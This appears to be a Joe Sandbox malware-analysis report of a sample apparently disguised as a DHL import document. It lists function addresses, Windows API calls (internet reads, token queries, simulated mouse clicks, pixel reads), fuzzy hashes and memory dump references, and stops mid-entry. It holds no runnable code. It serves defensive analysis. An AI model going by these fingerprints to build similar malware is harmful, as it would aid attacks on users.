Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: cf3fbaa2e15d134cff17744ad3ed11d2bb347e58dc87074d1f677e05aaaeda0f
Instruction ID: b69b2aa0420cbf6b257e54d58eb7b0cdc896f32d9e90f79c9675b4cbe5b66263
Opcode Fuzzy Hash: cf3fbaa2e15d134cff17744ad3ed11d2bb347e58dc87074d1f677e05aaaeda0f
Instruction Fuzzy Hash: 15310AB05047459EEB75CF349878BB63FF4BB11382F14055FE85A820A0E3B0A68CEB11

Function 0055CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0055C21E,00000000), ref: 0055CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0055CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0055C21E,00000000), ref: 0055CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0055C21E,00000000), ref: 0055CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0055C21E,00000000), ref: 0055CFF2

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: dba4d8dc977f7fd293cb8759354efd982570d9d9058a0baff0c79715e8af7985
Instruction ID: 5042c05287a203a083238f6c7962129419ebe7eaa291219b33149ca517921261
Opcode Fuzzy Hash: dba4d8dc977f7fd293cb8759354efd982570d9d9058a0baff0c79715e8af7985
Instruction Fuzzy Hash: 42317C71600305AFDB24DFA5D8949ABBFF9FF14316B10442FF90AD2101EB30AE48AB60

Function 00541901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00541915
PostMessageW.USER32(00000001,00000201,00000001), ref: 005419C1
Sleep.KERNEL32(00000000,?,?,?), ref: 005419C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 005419DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 005419E2

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 85d04937c29902f8907c42f8e53107b6acd7808bde721025dc4ae94f6ca425a8
Instruction ID: d70001efa45005e5de205d43499aad7a3edc143e9c676726b04da93806ffd851
Opcode Fuzzy Hash: 85d04937c29902f8907c42f8e53107b6acd7808bde721025dc4ae94f6ca425a8
Instruction Fuzzy Hash: CD31BF71A00219EFCB04CFA8DD99ADE3FB5FB54319F104229F925AB2D1C7709984EB90

Function 00575706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00575745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0057579D
_wcslen.LIBCMT ref: 005757AF
_wcslen.LIBCMT ref: 005757BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00575816

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 3bc263ee29f6b7eda7400638c150c150eace63a8ef60b63c579996503c3a6b15
Instruction ID: 6aa049da51e5fca7560d23f03a0d637bb0d041a94e83bbf33d5702ebeefd0ad5
Opcode Fuzzy Hash: 3bc263ee29f6b7eda7400638c150c150eace63a8ef60b63c579996503c3a6b15
Instruction Fuzzy Hash: 442195719046189ADB208F64EC88AEE7F78FF54360F10C616F91DDA1C0E7B09985DF50

Function 00560930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00560951
GetForegroundWindow.USER32 ref: 00560968
GetDC.USER32(00000000), ref: 005609A4
GetPixel.GDI32(00000000,?,00000003), ref: 005609B0
ReleaseDC.USER32(00000000,00000003), ref: 005609E8

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: baf5c2217be515e0995e901df3923fafef3227f7c50a30aa66c92a4a3553f11f
Instruction ID: 58b3b110d7275bbf8baab78b4be4c3996265b31ace82831a24d55386e4c2c754
Opcode Fuzzy Hash: baf5c2217be515e0995e901df3923fafef3227f7c50a30aa66c92a4a3553f11f
Instruction Fuzzy Hash: 32219F35600204AFD704EF69D889AAEBFE9FF44705F00846DE84AA7352CB70AD48DB90

Function 0051CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0051CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0051CDE9

Part of subcall function 00513820: RtlAllocateHeap.NTDLL(00000000,?,005B1444,?,004FFDF5,?,?,004EA976,00000010,005B1440,004E13FC,?,004E13C6,?,004E1129), ref: 00513852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0051CE0F
_free.LIBCMT ref: 0051CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0051CE31

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 7bcd2960696f2637f2cc133bebbcecc599a1d80069c40c494d7a3799ac4bb34a
Instruction ID: 8061c3f41b5531967162ed866ba89a192fe0f713e7bc78bcf3e99def4198f691
Opcode Fuzzy Hash: 7bcd2960696f2637f2cc133bebbcecc599a1d80069c40c494d7a3799ac4bb34a
Instruction Fuzzy Hash: FE0184726422157F332216BA7C8DDBF6D6DFFD6BA1315022DF909C7201EA628D91E1B0

Function 004F9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 004F9693
SelectObject.GDI32(?,00000000), ref: 004F96A2
BeginPath.GDI32(?), ref: 004F96B9
SelectObject.GDI32(?,00000000), ref: 004F96E2

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 12664f01f2fcb36764449a7fc8efb80acec9418d57c042b70ca33a2db92fbc44
Instruction ID: 4d07afbbd6040d3ee06f18986c778fa52dc8c44c03b5e0bf1880ef057ae1505c
Opcode Fuzzy Hash: 12664f01f2fcb36764449a7fc8efb80acec9418d57c042b70ca33a2db92fbc44
Instruction Fuzzy Hash: 8C217170801749EBEB919F64EC287BA3BA4BB20315F50031AF514961B0D3746C99EB9C

Function 00545711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00545726
_memcmp.LIBVCRUNTIME ref: 00545744
_memcmp.LIBVCRUNTIME ref: 00545757
_memcmp.LIBVCRUNTIME ref: 0054576F
_memcmp.LIBVCRUNTIME ref: 00545787

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 1919921766550e656e0d8440c38a1733a02d6885ac137be649ab4f23f58df124
Instruction ID: 9d10942085102df3d171b63e823489fb50c769b5cb1b90fd08fa60fce1f35d27
Opcode Fuzzy Hash: 1919921766550e656e0d8440c38a1733a02d6885ac137be649ab4f23f58df124
Instruction Fuzzy Hash: 500196B1645A05BBE20895109E46EFE7B5CFB613D8B008431FE099A282F660ED11D2A5

Function 00512DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0050F2DE,00513863,005B1444,?,004FFDF5,?,?,004EA976,00000010,005B1440,004E13FC,?,004E13C6), ref: 00512DFD
_free.LIBCMT ref: 00512E32
_free.LIBCMT ref: 00512E59
SetLastError.KERNEL32(00000000,004E1129), ref: 00512E66
SetLastError.KERNEL32(00000000,004E1129), ref: 00512E6F

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: c5e2bf0fe2c49ed09b02a87c3e4f0a3969735137bf7e5daf5f0b2aa3ad0fdd5a
Instruction ID: 684109ead69529f0ed4bb37a5dd388f9ac9848eafe9bd9d1a0cc94fdb66c6550
Opcode Fuzzy Hash: c5e2bf0fe2c49ed09b02a87c3e4f0a3969735137bf7e5daf5f0b2aa3ad0fdd5a
Instruction Fuzzy Hash: 7B01F9362456016BF71237347C49DFB2E5DBBD1375F204A28F429A21D2EA308CE5A020

Function 0054000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0053FF41,80070057,?,?,?,0054035E), ref: 0054002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0053FF41,80070057,?,?), ref: 00540046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0053FF41,80070057,?,?), ref: 00540054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0053FF41,80070057,?), ref: 00540064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0053FF41,80070057,?,?), ref: 00540070

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: f21a5471fcbdc432436015639a4b321c55d5d526e21850233c4670744514bad3
Instruction ID: 278677cca098e8af2fcc2cc1e59d5834996652a7e79978798b8c418590261434
Opcode Fuzzy Hash: f21a5471fcbdc432436015639a4b321c55d5d526e21850233c4670744514bad3
Instruction Fuzzy Hash: 45018F72600204BFDB204F69EC08BEA7EADFB44755F245528FE09D3250D771DE84ABA0

Function 0054E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0054E997
QueryPerformanceFrequency.KERNEL32(?), ref: 0054E9A5
Sleep.KERNEL32(00000000), ref: 0054E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 0054E9B7
Sleep.KERNEL32 ref: 0054E9F3

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: de757351fbb7dfae3607c6aa96fcfc217f58c7d9a8f017f0a5fddbfa1968a5da
Instruction ID: ae788b29bcb0a42780633bc25112bd2c5275577f6299ee8978329ad68029e69e
Opcode Fuzzy Hash: de757351fbb7dfae3607c6aa96fcfc217f58c7d9a8f017f0a5fddbfa1968a5da
Instruction Fuzzy Hash: E3012931C01629DBCF00AFE5EC5AAEDBF78FF19715F41055AE502B2285CB309598EBA1

Function 005410F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00541114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00540B9B,?,?,?), ref: 00541120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00540B9B,?,?,?), ref: 0054112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00540B9B,?,?,?), ref: 00541136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0054114D

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: feb3e25910573b464e681cb8945cc803b969d01318d6770f50045f059d3ad719
Instruction ID: d737483fc3a77e68379ade2390e223d8cca064f8f587f3d69b80ba168f08bdb8
Opcode Fuzzy Hash: feb3e25910573b464e681cb8945cc803b969d01318d6770f50045f059d3ad719
Instruction Fuzzy Hash: F0018175100605BFDB114F64EC49EAA3F6EFF85365B100428FA45C3350DB31DC80EA60

Function 00540FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00540FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00540FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00540FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00540FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00541002

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 356b686c95a63d816ce548c6ddde299614c7423c36c8f14a6b8fd33385a728cb
Instruction ID: 7b93691f095f42ad76a78579d9652e978bbcdf2ad020b08e9da537226e64d075
Opcode Fuzzy Hash: 356b686c95a63d816ce548c6ddde299614c7423c36c8f14a6b8fd33385a728cb
Instruction Fuzzy Hash: 8BF04935200701ABDB214FA5AC4DF9A3FADFF99762F504428FA4DD6251DA70DC84AA60

Function 00541014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0054102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00541036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00541045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0054104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00541062

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 0e435a10223b8243bdc8d298cc9f5a1777337c2acd39cf6c074d368614c4afda
Instruction ID: 7ccc25ad888a7923d6ab2dda9dfdd185f4e6793a9319991d26a16312e65b8b26
Opcode Fuzzy Hash: 0e435a10223b8243bdc8d298cc9f5a1777337c2acd39cf6c074d368614c4afda
Instruction Fuzzy Hash: F5F04935200701ABDB215FA6EC4DF9A3FADFF99761F100428FA4DD7250CA70D894AA60

Function 0055030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0055017D,?,005532FC,?,00000001,00522592,?), ref: 00550324
CloseHandle.KERNEL32(?,?,?,?,0055017D,?,005532FC,?,00000001,00522592,?), ref: 00550331
CloseHandle.KERNEL32(?,?,?,?,0055017D,?,005532FC,?,00000001,00522592,?), ref: 0055033E
CloseHandle.KERNEL32(?,?,?,?,0055017D,?,005532FC,?,00000001,00522592,?), ref: 0055034B
CloseHandle.KERNEL32(?,?,?,?,0055017D,?,005532FC,?,00000001,00522592,?), ref: 00550358
CloseHandle.KERNEL32(?,?,?,?,0055017D,?,005532FC,?,00000001,00522592,?), ref: 00550365

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 85b140628d32d7e1fcefe28c56724a6fb8cdb6ba9e8f398240c83d82cf54f49e
Instruction ID: ec5341cd0374b0031691c05a923f024ce4470f75b84fd4de652da8b5e9730278
Opcode Fuzzy Hash: 85b140628d32d7e1fcefe28c56724a6fb8cdb6ba9e8f398240c83d82cf54f49e
Instruction Fuzzy Hash: E801A272800B159FC7309F66D890416FBF5BF603163169E3FD19652971C371A958DF80

Function 0051D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0051D752

Part of subcall function 005129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0051D7D1,00000000,00000000,00000000,00000000,?,0051D7F8,00000000,00000007,00000000,?,0051DBF5,00000000), ref: 005129DE
Part of subcall function 005129C8: GetLastError.KERNEL32(00000000,?,0051D7D1,00000000,00000000,00000000,00000000,?,0051D7F8,00000000,00000007,00000000,?,0051DBF5,00000000,00000000), ref: 005129F0

_free.LIBCMT ref: 0051D764
_free.LIBCMT ref: 0051D776
_free.LIBCMT ref: 0051D788
_free.LIBCMT ref: 0051D79A

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: decda32d8b48960e96e9664a7cf1191bcc45ed2df8e308d33fdb831fb3e25bf9
Instruction ID: 927b9d0f10cfc7e4004f84543c5e27565eff2e82825383700833e94382da6a4e
Opcode Fuzzy Hash: decda32d8b48960e96e9664a7cf1191bcc45ed2df8e308d33fdb831fb3e25bf9
Instruction Fuzzy Hash: D3F0FF32544215ABA621EB68F9C9D967FEDFB55720B940C05F049DB542CB24FCD086B4

Function 00545C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00545C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00545C6F
MessageBeep.USER32(00000000), ref: 00545C87
KillTimer.USER32(?,0000040A), ref: 00545CA3
EndDialog.USER32(?,00000001), ref: 00545CBD

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 65fc1ee779a039c6f4503db942aa1529b25a86c4ab34e38ddf210f41b9146577
Instruction ID: a01e084114e71970d51c99c09e16c156967bb6b286184fe2981d89858c4e04d1
Opcode Fuzzy Hash: 65fc1ee779a039c6f4503db942aa1529b25a86c4ab34e38ddf210f41b9146577
